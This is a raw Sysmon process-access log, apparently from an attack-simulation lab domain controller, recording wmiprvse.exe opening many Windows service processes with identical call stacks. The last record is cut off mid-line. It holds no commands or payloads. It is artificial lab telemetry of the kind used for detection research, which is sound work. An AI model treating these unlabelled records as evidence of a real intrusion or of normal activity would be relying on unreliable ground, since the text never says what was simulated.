10341000x800000000000000025171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 